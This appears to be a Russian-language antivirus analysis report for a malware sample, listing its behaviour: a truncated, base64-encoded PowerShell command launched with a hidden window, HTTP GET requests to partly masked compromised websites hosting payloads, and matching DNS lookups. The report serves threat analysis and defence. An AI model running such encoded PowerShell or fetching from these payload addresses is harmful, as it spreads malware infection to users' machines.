Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAGkAbgBsAF8AcAB2AD0AKAAoACcAQQB2ACcAKwAnAGoAJwApACsAJwBvADcAJwArACcAdAAyACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAFIAbwBGAGkATABlAFwAQgBvAG...
Сетевая активность
TCP
Запросы HTTP GET
- http://be##-met.pl/eps/MtoHo/
- http://be##-met.pl/index.php/pl/eps/MtoHo
- http://as####entsorg.de/2010/xjq1xcjeh34720596/
- http://bu####lz-markus.de/Download/file/QqXIfDYVehhy/
- http://ca###enpetry.de/WordPress_01/7X0pcw0y995571/
- http://ch#####ph-oberhoff.de/cgi-bin/attach/xFf/
- http://ca####studios.com/images/file/Rayo/
UDP
- DNS ASK al###abel.de
- DNS ASK be##-met.pl
- DNS ASK as####entsorg.de
- DNS ASK bu####lz-markus.de
- DNS ASK ca###enpetry.de
- DNS ASK ch#####ph-oberhoff.de
- DNS ASK ca####studios.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAGkAbgBsAF8AcAB2AD0AKAAoACcAQQB2ACcAKwAnAGoAJwApACsAJwBvADcAJwArACcAdAAyACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAFIAbwBGAGkATABlAFwAQgBvAG...' (со скрытым окном)
